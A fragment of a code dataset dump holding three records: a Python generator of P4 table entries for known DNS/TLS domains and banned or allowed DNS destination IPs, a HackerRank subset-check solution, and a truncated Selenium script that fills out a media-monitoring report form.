part1DictT[parts[0]]\n if (parts[0] == '*' and '*.' in part1DictT):\n return part1DictT['*.']\n if (parts[0] == '*.' and '*' in part1DictT):\n return part1DictT['*']\n\n global globalID1T\n global priority1T\n globalID1T = globalID1T + 1\n part1DictT[parts[0]] = globalID1T\n\n if (parts[0] == '*' or parts[0] == '*.'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q1\",\n \"match\": {},\n \"action_name\": \"TopIngress.match_q1\",\n \"priority\": 1,\n \"action_params\": {\"q1id\": globalID1T}\n })\n return globalID1T\n\n dict_t = dictSetUpT(1)\n addPart1ToDictT(parts[0], dict_t)\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q1\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q1\",\n \"priority\": priority1T,\n \"action_params\": {\"q1id\": globalID1T}\n })\n priority1T = priority1T - 1\n\n return globalID1T\n\n# If len(parts)==2\ndef twopartsT(parts):\n \n if parts[1] in part2DictT:\n return part2DictT[parts[1]]\n if (parts[1] == '*' and '*.' in part2DictT):\n return part2DictT['*.']\n if (parts[1] == '*.' and '*' in part2DictT):\n return part2DictT['*']\n\n global globalID2T\n global priority2T\n globalID2T = globalID2T + 1\n part2DictT[parts[1]] = globalID2T\n\n if (parts[1] == '*' or parts[1] == '*.'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q2\",\n \"match\": {},\n \"action_name\": \"TopIngress.match_q2\",\n \"priority\": 1,\n \"action_params\": {\"q2id\": globalID2T}\n })\n return globalID2T\n\n dict_t = dictSetUpT(2)\n addPart2ToDictT(parts[1], dict_t)\n\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q2\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q2\",\n \"priority\": priority2T,\n \"action_params\": {\"q2id\": globalID2T}\n })\n priority2T = priority2T - 1\n return globalID2T\n\n# If len(parts)==3\ndef threepartsT(parts):\n \n if parts[2] in part3DictT:\n return part3DictT[parts[2]]\n if (parts[2] == '*' and '*.' in part3DictT):\n return part3DictT['*.']\n if (parts[2] == '*.' and '*' in part3DictT):\n return part3DictT['*']\n\n global globalID3T\n global priority3T\n globalID3T = globalID3T + 1\n part3DictT[parts[2]] = globalID3T\n\n if (parts[2] == '*' or parts[2] == '*.'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q3\",\n \"match\": {},\n \"action_name\": \"TopIngress.match_q3\",\n \"priority\": 1,\n \"action_params\": {\"q3id\": globalID3T}\n })\n return globalID3T\n\n dict_t = dictSetUpT(3)\n addPart3ToDictT(parts[2], dict_t)\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q3\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q3\",\n \"priority\": priority3T,\n \"action_params\": {\"q3id\": globalID3T}\n })\n priority3T = priority3T - 1\n return globalID3T\n\n# If len(parts)==4\ndef fourpartsT(parts):\n \n if parts[3] in part4DictT:\n return part4DictT[parts[3]]\n if (parts[3] == '*' and '*.' in part4DictT):\n return part4DictT['*.']\n if (parts[3] == '*.' and '*' in part4DictT):\n return part4DictT['*']\n\n global globalID4T\n global priority4T\n globalID4T = globalID4T + 1\n part4DictT[parts[3]] = globalID4T\n\n if (parts[3] == '*' or parts[3] == '*.'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q4\",\n \"match\": {},\n \"action_name\": \"TopIngress.match_q4\",\n \"priority\": 1,\n \"action_params\": {\"q4id\": globalID4T}\n })\n return globalID4T\n\n dict_t = dictSetUpT(4)\n addPart4ToDictT(parts[3], dict_t)\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q4\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q4\",\n \"priority\": priority4T,\n \"action_params\": {\"q4id\": globalID4T}\n })\n priority4T = priority4T - 1\n return globalID4T\n\n# If len(parts)==5\ndef fivepartsT(parts):\n \n if parts[4] in part5DictT:\n return part5DictT[parts[4]]\n if (parts[4] == '*' and '*.' in part5DictT):\n return part5DictT['*.']\n if (parts[4] == '*.' and '*' in part5DictT):\n return part5DictT['*']\n\n global globalID5T\n global priority5T\n globalID5T = globalID5T + 1\n part5DictT[parts[4]] = globalID5T\n\n if (parts[4] == '*' or parts[4] == '*.'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q5\",\n \"match\": {},\n \"action_name\": \"TopIngress.match_q5\",\n \"priority\": 1,\n \"action_params\": {\"q5id\": globalID5T}\n })\n return globalID5T\n\n dict_t = dictSetUpT(5)\n addPart5ToDictT(parts[4], dict_t)\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsknown_domain_list_q5\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q5\",\n \"priority\": priority5T,\n \"action_params\": {\"q5id\": globalID5T}\n })\n priority5T = priority5T - 1\n return globalID5T\n\ndef creatDomainEntryT(parts):\n id5 = fivepartsT(parts)\n id4 = fourpartsT(parts)\n id3 = threepartsT(parts)\n id2 = twopartsT(parts)\n id1 = onepartsT(parts)\n\n global globalIDT\n globalIDT = globalIDT + 1\n\n idDict = {\n \"user_metadata.q1_id\": id1,\n \"user_metadata.q2_id\": id2,\n \"user_metadata.q3_id\": id3,\n \"user_metadata.q4_id\": id4,\n \"user_metadata.q5_id\": id5\n }\n\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.tlsmatch_known_domain_list\",\n \"match\": idDict,\n \"action_name\": \"TopIngress.match_domain\",\n \"action_params\": {\"id\": globalID}\n })\n\ndef dictSetUp(partNum):\n if (partNum == 1):\n partsDict = {\n \"headers.q1_part1.part\": [0, 255],\n \"headers.q1_part2.part\": [0, 65535],\n \"headers.q1_part4.part\": [0, 4294967295],\n \"headers.q1_part8_1.part\": [0, 4294967295],\n \"headers.q1_part8_2.part\": [0, 4294967295],\n \"headers.q1_part16_1.part\": [0, 4294967295],\n \"headers.q1_part16_2.part\": [0, 4294967295],\n \"headers.q1_part16_3.part\": [0, 4294967295],\n \"headers.q1_part16_4.part\": [0, 4294967295]\n }\n return partsDict\n elif (partNum == 2):\n partsDict = {\n \"headers.q2_part1.part\": [0, 255],\n \"headers.q2_part2.part\": [0, 65535],\n \"headers.q2_part4.part\": [0, 4294967295],\n \"headers.q2_part8_1.part\": [0, 4294967295],\n \"headers.q2_part8_2.part\": [0, 4294967295],\n \"headers.q2_part16_1.part\": [0, 4294967295],\n \"headers.q2_part16_2.part\": [0, 4294967295],\n \"headers.q2_part16_3.part\": [0, 4294967295],\n \"headers.q2_part16_4.part\": [0, 4294967295],\n }\n return partsDict\n elif (partNum == 3):\n partsDict = {\n \"headers.q3_part1.part\": [0, 255],\n \"headers.q3_part2.part\": [0, 65535],\n \"headers.q3_part4.part\": [0, 4294967295],\n \"headers.q3_part8_1.part\": [0, 4294967295],\n \"headers.q3_part8_2.part\": [0, 4294967295],\n \"headers.q3_part16_1.part\": [0, 4294967295],\n \"headers.q3_part16_2.part\": [0, 4294967295],\n \"headers.q3_part16_3.part\": [0, 4294967295],\n \"headers.q3_part16_4.part\": [0, 4294967295],\n }\n return partsDict\n elif (partNum == 4):\n partsDict = {\n \"headers.q4_part1.part\": [0, 255],\n \"headers.q4_part2.part\": [0, 65535],\n \"headers.q4_part4.part\": [0, 4294967295],\n \"headers.q4_part8_1.part\": [0, 4294967295],\n \"headers.q4_part8_2.part\": [0, 4294967295],\n \"headers.q4_part16_1.part\": [0, 4294967295],\n \"headers.q4_part16_2.part\": [0, 4294967295],\n \"headers.q4_part16_3.part\": [0, 4294967295],\n \"headers.q4_part16_4.part\": [0, 4294967295],\n }\n return partsDict\n elif (partNum == 5):\n partsDict = {\n \"headers.q5_part1.part\": [0, 255],\n \"headers.q5_part2.part\": [0, 65535],\n \"headers.q5_part4.part\": [0, 4294967295],\n \"headers.q5_part8_1.part\": [0, 4294967295],\n \"headers.q5_part8_2.part\": [0, 4294967295],\n \"headers.q5_part16_1.part\": [0, 4294967295],\n \"headers.q5_part16_2.part\": [0, 4294967295],\n \"headers.q5_part16_3.part\": [0, 4294967295],\n \"headers.q5_part16_4.part\": [0, 4294967295],\n }\n return partsDict\n return -1\n\n \n# Outputs a reversed, 5 digit, binary representation\ndef toReversedBinary(num):\n num1 = bin(num)[2::] # cut out 0b prefix\n if len(num1) >= 5:\n num1 = num1[len(num1)-5:len(num1):]\n else:\n for i in range(0, 5-len(num1)):\n num1 = '0' + num1\n return num1[::-1]\n\ndef addPart1ToDict(part, partsDict):\n if (part == '*'):\n partsDict.pop(\"headers.q1_part1.part\")\n partsDict.pop(\"headers.q1_part2.part\")\n partsDict.pop(\"headers.q1_part4.part\")\n partsDict.pop(\"headers.q1_part8_1.part\")\n partsDict.pop(\"headers.q1_part8_2.part\")\n partsDict.pop(\"headers.q1_part16_1.part\")\n partsDict.pop(\"headers.q1_part16_2.part\")\n partsDict.pop(\"headers.q1_part16_3.part\")\n partsDict.pop(\"headers.q1_part16_4.part\")\n return partsDict\n\n part1Spec = toReversedBinary(len(part))\n\n charIndex = 0\n if part1Spec[0] == '1':\n partsDict[\"headers.q1_part1.part\"] = [part[charIndex], 255]\n charIndex = charIndex + 1\n if part1Spec[1] == '1':\n partsDict[\"headers.q1_part2.part\"] = [part[charIndex:charIndex+2], 65535]\n charIndex = charIndex + 2\n if part1Spec[2] == '1':\n partsDict[\"headers.q1_part4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part1Spec[3] == '1':\n partsDict[\"headers.q1_part8_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q1_part8_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part1Spec[4] == '1':\n partsDict[\"headers.q1_part16_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q1_part16_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q1_part16_3.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q1_part16_4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n return partsDict\n\ndef addPart2ToDict(part, partsDict):\n if (part == '*'):\n partsDict.pop(\"headers.q2_part1.part\")\n partsDict.pop(\"headers.q2_part2.part\")\n partsDict.pop(\"headers.q2_part4.part\")\n partsDict.pop(\"headers.q2_part8_1.part\")\n partsDict.pop(\"headers.q2_part8_2.part\")\n partsDict.pop(\"headers.q2_part16_1.part\")\n partsDict.pop(\"headers.q2_part16_2.part\")\n partsDict.pop(\"headers.q2_part16_3.part\")\n partsDict.pop(\"headers.q2_part16_4.part\")\n return partsDict\n\n part2Spec = toReversedBinary(len(part))\n\n charIndex = 0\n if part2Spec[0] == '1':\n partsDict[\"headers.q2_part1.part\"] = [part[charIndex], 255]\n charIndex = charIndex + 1\n if part2Spec[1] == '1':\n partsDict[\"headers.q2_part2.part\"] = [part[charIndex:charIndex+2], 65535]\n charIndex = charIndex + 2\n if part2Spec[2] == '1':\n partsDict[\"headers.q2_part4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part2Spec[3] == '1':\n partsDict[\"headers.q2_part8_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q2_part8_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part2Spec[4] == '1':\n partsDict[\"headers.q2_part16_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q2_part16_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q2_part16_3.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q2_part16_4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n return partsDict\n\ndef addPart3ToDict(part, partsDict):\n if (part == '*'):\n partsDict.pop(\"headers.q3_part1.part\")\n partsDict.pop(\"headers.q3_part2.part\")\n partsDict.pop(\"headers.q3_part4.part\")\n partsDict.pop(\"headers.q3_part8_1.part\")\n partsDict.pop(\"headers.q3_part8_2.part\")\n partsDict.pop(\"headers.q3_part16_1.part\")\n partsDict.pop(\"headers.q3_part16_2.part\")\n partsDict.pop(\"headers.q3_part16_3.part\")\n partsDict.pop(\"headers.q3_part16_4.part\")\n return partsDict\n\n part3Spec = toReversedBinary(len(part))\n\n charIndex = 0\n if part3Spec[0] == '1':\n partsDict[\"headers.q3_part1.part\"] = [part[charIndex], 255]\n charIndex = charIndex + 1\n if part3Spec[1] == '1':\n partsDict[\"headers.q3_part2.part\"] = [part[charIndex:charIndex+2], 65535]\n charIndex = charIndex + 2\n if part3Spec[2] == '1':\n partsDict[\"headers.q3_part4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part3Spec[3] == '1':\n partsDict[\"headers.q3_part8_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q3_part8_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part3Spec[4] == '1':\n partsDict[\"headers.q3_part16_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q3_part16_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q3_part16_3.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q3_part16_4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n return partsDict\n\ndef addPart4ToDict(part, partsDict):\n if (part == '*'):\n partsDict.pop(\"headers.q4_part1.part\")\n partsDict.pop(\"headers.q4_part2.part\")\n partsDict.pop(\"headers.q4_part4.part\")\n partsDict.pop(\"headers.q4_part8_1.part\")\n partsDict.pop(\"headers.q4_part8_2.part\")\n partsDict.pop(\"headers.q4_part16_1.part\")\n partsDict.pop(\"headers.q4_part16_2.part\")\n partsDict.pop(\"headers.q4_part16_3.part\")\n partsDict.pop(\"headers.q4_part16_4.part\")\n return partsDict\n\n part4Spec = toReversedBinary(len(part))\n\n charIndex = 0\n if part4Spec[0] == '1':\n partsDict[\"headers.q4_part1.part\"] = [part[charIndex], 255]\n charIndex = charIndex + 1\n if part4Spec[1] == '1':\n partsDict[\"headers.q4_part2.part\"] = [part[charIndex:charIndex+2], 65535]\n charIndex = charIndex + 2\n if part4Spec[2] == '1':\n partsDict[\"headers.q4_part4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part4Spec[3] == '1':\n partsDict[\"headers.q4_part8_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q4_part8_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part4Spec[4] == '1':\n partsDict[\"headers.q4_part16_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q4_part16_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q4_part16_3.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q4_part16_4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n return partsDict\n\ndef addPart5ToDict(part, partsDict):\n if (part == '*'):\n partsDict.pop(\"headers.q5_part1.part\")\n partsDict.pop(\"headers.q5_part2.part\")\n partsDict.pop(\"headers.q5_part4.part\")\n partsDict.pop(\"headers.q5_part8_1.part\")\n partsDict.pop(\"headers.q5_part8_2.part\")\n partsDict.pop(\"headers.q5_part16_1.part\")\n partsDict.pop(\"headers.q5_part16_2.part\")\n partsDict.pop(\"headers.q5_part16_3.part\")\n partsDict.pop(\"headers.q5_part16_4.part\")\n return partsDict\n\n part5Spec = toReversedBinary(len(part))\n\n charIndex = 0\n if part5Spec[0] == '1':\n partsDict[\"headers.q5_part1.part\"] = [part[charIndex], 255]\n charIndex = charIndex + 1\n if part5Spec[1] == '1':\n partsDict[\"headers.q5_part2.part\"] = [part[charIndex:charIndex+2], 65535]\n charIndex = charIndex + 2\n if part5Spec[2] == '1':\n partsDict[\"headers.q5_part4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part5Spec[3] == '1':\n partsDict[\"headers.q5_part8_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q5_part8_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n if part5Spec[4] == '1':\n partsDict[\"headers.q5_part16_1.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q5_part16_2.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q5_part16_3.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n partsDict[\"headers.q5_part16_4.part\"] = [part[charIndex:charIndex+4], 4294967295]\n charIndex = charIndex + 4\n return partsDict\n\npart5Dict = {}\npart4Dict = {}\npart3Dict = {}\npart2Dict = {}\npart1Dict = {}\n\n# If len(parts)==1\ndef oneparts(parts):\n if parts[0] in part1Dict:\n return part1Dict[parts[0]]\n global globalID1\n global priority1\n globalID1 = globalID1 + 1\n part1Dict[parts[0]] = globalID1\n\n dict_t = dictSetUp(1)\n addPart1ToDict(parts[0], dict_t)\n\n if (parts[0] == '*'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q1\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q1\",\n \"priority\": 1,\n \"action_params\": {\"q1id\": globalID1}\n })\n return globalID1\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q1\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q1\",\n \"priority\": priority1,\n \"action_params\": {\"q1id\": globalID1}\n })\n priority1 = priority1 - 1\n\n return globalID1\n\n# If len(parts)==2\ndef twoparts(parts):\n \n if parts[1] in part2Dict:\n return part2Dict[parts[1]]\n global globalID2\n global priority2\n globalID2 = globalID2 + 1\n part2Dict[parts[1]] = globalID2\n\n dict_t = dictSetUp(2)\n addPart2ToDict(parts[1], dict_t)\n\n if (parts[1] == '*'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q2\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q2\",\n \"priority\": 1,\n \"action_params\": {\"q2id\": globalID2}\n })\n return globalID2\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q2\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q2\",\n \"priority\": priority2,\n \"action_params\": {\"q2id\": globalID2}\n })\n priority2 = priority2 - 1\n return globalID2\n\n# If len(parts)==3\ndef threeparts(parts):\n \n if parts[2] in part3Dict:\n return part3Dict[parts[2]]\n global globalID3\n global priority3\n globalID3 = globalID3 + 1\n part3Dict[parts[2]] = globalID3\n\n dict_t = dictSetUp(3)\n addPart3ToDict(parts[2], dict_t)\n\n if (parts[2] == '*'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q3\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q3\",\n \"priority\": 1,\n \"action_params\": {\"q3id\": globalID3}\n })\n return globalID3\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q3\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q3\",\n \"priority\": priority3,\n \"action_params\": {\"q3id\": globalID3}\n })\n priority3 = priority3 - 1\n return globalID3\n\n# If len(parts)==4\ndef fourparts(parts):\n \n if parts[3] in part4Dict:\n return part4Dict[parts[3]]\n global globalID4\n global priority4\n globalID4 = globalID4 + 1\n part4Dict[parts[3]] = globalID4\n\n dict_t = dictSetUp(4)\n addPart4ToDict(parts[3], dict_t)\n\n if (parts[3] == '*'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q4\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q4\",\n \"priority\": 1,\n \"action_params\": {\"q4id\": globalID4}\n })\n return globalID4\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q4\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q4\",\n \"priority\": priority4,\n \"action_params\": {\"q4id\": globalID4}\n })\n priority4 = priority4 - 1\n return globalID4\n\n# If len(parts)==5\ndef fiveparts(parts):\n \n if parts[4] in part5Dict:\n return part5Dict[parts[4]]\n global globalID5\n global priority5\n globalID5 = globalID5 + 1\n part5Dict[parts[4]] = globalID5\n\n dict_t = dictSetUp(5)\n addPart5ToDict(parts[4], dict_t)\n\n if (parts[4] == '*'):\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q5\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q5\",\n \"priority\": 1,\n \"action_params\": {\"q5id\": globalID5}\n })\n return globalID5\n \n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsknown_domain_list_q5\",\n \"match\": dict_t,\n \"action_name\": \"TopIngress.match_q5\",\n \"priority\": priority5,\n \"action_params\": {\"q5id\": globalID5}\n })\n priority5 = priority5 - 1\n return globalID5\n\ndef creatDomainEntry(parts):\n id5 = fiveparts(parts)\n id4 = fourparts(parts)\n id3 = threeparts(parts)\n id2 = twoparts(parts)\n id1 = oneparts(parts)\n\n global globalID\n globalID = globalID + 1\n\n idDict = {\n \"user_metadata.q1_id\": id1,\n \"user_metadata.q2_id\": id2,\n \"user_metadata.q3_id\": id3,\n \"user_metadata.q4_id\": id4,\n \"user_metadata.q5_id\": id5\n }\n\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.dnsmatch_known_domain_list\",\n \"match\": idDict,\n \"action_name\": \"TopIngress.match_domain\",\n \"action_params\": {\"id\": globalID}\n })\n\n\ndef addDomainToTable(domain):\n parts = domain.split('.')\n numParts = len(parts)\n if numParts > 5:\n print(\"error: \" + domain)\n return -1\n if numParts == 1:\n parts.append('')\n parts.append('')\n parts.append('')\n parts.append('')\n creatDomainEntry(parts)\n creatDomainEntryT(parts)\n elif numParts == 2:\n parts.append('')\n parts.append('')\n parts.append('')\n creatDomainEntry(parts)\n parts[0] = parts[0] + '.'\n creatDomainEntryT(parts)\n elif numParts == 3:\n parts.append('')\n parts.append('')\n creatDomainEntry(parts)\n parts[0] = parts[0] + '.'\n parts[1] = parts[1] + '.'\n creatDomainEntryT(parts)\n elif numParts == 4:\n parts.append('')\n creatDomainEntry(parts)\n parts[0] = parts[0] + '.'\n parts[1] = parts[1] + '.'\n parts[2] = parts[2] + '.'\n creatDomainEntryT(parts)\n elif numParts == 5:\n creatDomainEntry(parts)\n parts[0] = parts[0] + '.'\n parts[1] = parts[1] + '.'\n parts[2] = parts[2] + '.'\n parts[3] = parts[3] + '.'\n creatDomainEntryT(parts)\n\ndef addBannedIpToTable(ip):\n ipList = ip.split('/')\n if (len(ipList) == 2):\n mask = int(ipList[1])\n elif (len(ipList) == 1):\n mask = 32\n else:\n exit(-1)\n ipaddr = ipList[0]\n ip_dict = {\n \"headers.ipv4.dst\": [ipaddr, mask]\n }\n ip_dict['headers.ipv4.dst']\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.banned_dns_dst\",\n \"match\": ip_dict,\n \"action_name\": \"TopIngress.match_banned_dns_dst\",\n \"action_params\": {}\n })\n\ndef addAllowedIpToTable(ip):\n ipList = ip.split('/')\n if (len(ipList) == 2):\n mask = int(ipList[1])\n elif (len(ipList) == 1):\n mask = 32\n else:\n exit(-1)\n ipaddr = ipList[0]\n ip_dict = {\n \"headers.ipv4.dst\": [ipaddr, mask]\n }\n ip_dict['headers.ipv4.dst']\n data[\"table_entries\"].append({\n \"table\": \"TopIngress.allowable_dns_dst\",\n \"match\": ip_dict,\n \"action_name\": \"NoAction\",\n \"action_params\": {}\n })\n \nknownlist = open('known_domains.txt', 'r')\ndomains = knownlist.read().split()\nknownlist.close()\n\npriority1T = len(domains) + 1\npriority2T = len(domains) + 1\npriority3T = len(domains) + 1\npriority4T = len(domains) + 1\npriority5T = len(domains) + 1\n\nfor d in domains:\n addDomainToTable(d)\n\nbannedlist = open('banned_dns_dst.txt', 'r')\nbannedip = bannedlist.read().split()\nbannedlist.close()\n\ndata[\"table_entries\"].append({\n \"table\": \"TopIngress.banned_dns_dst\",\n \"default_action\": True,\n \"action_name\": \"NoAction\",\n \"action_params\": {}\n})\n\nfor ip in bannedip:\n addBannedIpToTable(ip)\n\nallowedlist = open('allowed_dns_dst.txt', 'r')\nallowedip = allowedlist.read().split()\nallowedlist.close()\n\ndata[\"table_entries\"].append({\n \"table\": \"TopIngress.allowable_dns_dst\",\n \"default_action\": True,\n \"action_name\": \"TopIngress.match_banned_dns_dst\",\n \"action_params\": {}\n})\n\nfor ip in allowedip:\n addAllowedIpToTable(ip)\n\nwith open('s1-runtime.json', 'w') as outFile:\n json.dump(data, outFile, indent='\\t')\n\n","sub_path":"Combined_Netassay/comb_json_155.py","file_name":"comb_json_155.py","file_ext":"py","file_size_in_byte":49321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"611095769","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\r\nt=int(input())\r\nfor i in range(t):\r\n na=int(input())\r\n a=input().split()\r\n a=set(a)\r\n nb=int(input())\r\n b=input().split()\r\n b=set(b)\r\n if a.intersection(b)==a:\r\n print(True)\r\n else:\r\n print(False)","sub_path":"Python/Check Subset.py","file_name":"Check Subset.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"572131059","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n# from selenium.webdriver.support.ui import Select\nimport conf\n\nd = webdriver.Firefox()\nd.implicitly_wait(10)\n\ndef s(name, val, submit=None, ty=None):\n\tif not ty:\n\t\te = d.find_element_by_name(name)\n\t\te.send_keys(val)\n\telif ty == 'radio':\n\t\te = d.find_element_by_css_selector(\"input[name='{}'][value='{}']\".format(name, val))\n\t\te.click()\n\tif submit:\n\t\te.submit()\n\ndef a(val, text, ty='eq', sel='id'):\n\tif sel == 'id':\n\t\te = d.find_element_by_id(val)\n\telif sel == 'css':\n\t\te = d.find_element_by_css_selector(val)\t\n\t# print(e.text)\n\tif ty == 'eq':\n\t\tassert text == e.text\n\telif ty == 'in':\n\t\tassert text in e.text\n\n# login\nd.get(conf.url + 'auth/login')\ns('identity', conf.identity)\ns('password', conf.password, 1)\n# add report\nd.get(conf.url + 'home/lang/english')\nd.get(conf.url + 'monitor/add/5')\ns('entry_name', 'entry_name')\ns('entry_url', 'entry_url')\n# s('entry_dur', '46')\ns('entry_d', '2018-12-17')\ns('report_gender_num_male', '7')\ns('report_gender_num_female', '1')\ns('report_gender_text', 'gender comment')\ns('report_groups_concern', 'low', None, 'radio')\n\"\"\"\n 'entry_type_audio', '1'\n 'entry_type_video', '1'\n 'entry_category_id', '5'\n\"\"\"\n# langs\nfor i, keys in enumerate([[Keys.DOWN, Keys.RETURN], [Keys.DOWN, Keys.DOWN, Keys.RETURN]]):\n\ti = str(i + 1)\n\tsel_t = '[name=\"entry_lang_{}_name\"]'.format(i)\n\td.execute_script(\"$('{}').select2('open');\".format(sel_t))\n\td.find_element_by_name('entry_lang_{}_name'.format(i)).send_keys(keys)\n\td.execute_script(\"$('{}').select2('close');\".format(sel_t))\n\t# add one more lang\n\td.find_element_by_name('entry_lang').click()\n\nfor i, val in enumerate(['mostly', 'barely']):\n\ts('entry_lang_{}_part'.format(i + 1), val, None, 'radio')\n\n# main ideas\ns('report_main_text_1', 'idea 1')\ns('report_main_text_2', 'idea 2')\ns('report_main_text_3', 'idea 1')\ns('report_main_text_5', 'idea 3')\ne = d.find_element_by_name('report_main_text')\ne.click()\ne.click()\ne.click()\ns('report_main_text_8', 'idea 4')\n# statements\nsts = [\n\t[\t'statement 1', 'statement1-author-name', 'male', 'statement1-author-religion',\n\t\t['12', 'statement1-author-ethn1'], [\n\t\t\t[['16', '7', 'statement1-group1'], 'rather_negative', 'no', 'no', \n\t\t\t'statement1-quote', 'statement1-term']\n\t\t]\n\t],\n\t[\t'statement2-text', 'statement2-author-name', 'female', 'statement2-author-religion',\n\t\t['12', '10', 'http:', 'statement2-author-ethn1'], [\n\t\t\t[['16', '13', 'statement2-author-group1'], 'rather_positive', 'no', 'yes',\n\t\t\t'statement2-quote', 'statement2-term'],\n\t\t\t[['6'], 'neutral', 'yes', 'no', \n\t\t\t'statement2-group2-quote', 'statement2-group2-term']\n\t\t]\n\t]\n]\ni = 1\nfor text, a_name, a_gen, a_rel, a_ethn, grps in sts:\n\t# print(grps)\n\ts('statement_{}_text'.format(i), text)\n\ts('statement_{}_author_gender'.format(i), a_gen, None, 'radio')\n\t# author name religion ethnicity\n\tatr = [\n\t\t['statement_{}_author_name', [a_name]], \n\t\t['statement_{}_author_religion', [a_rel]],\n\t\t['statement_{}_author_ethnicity[]', 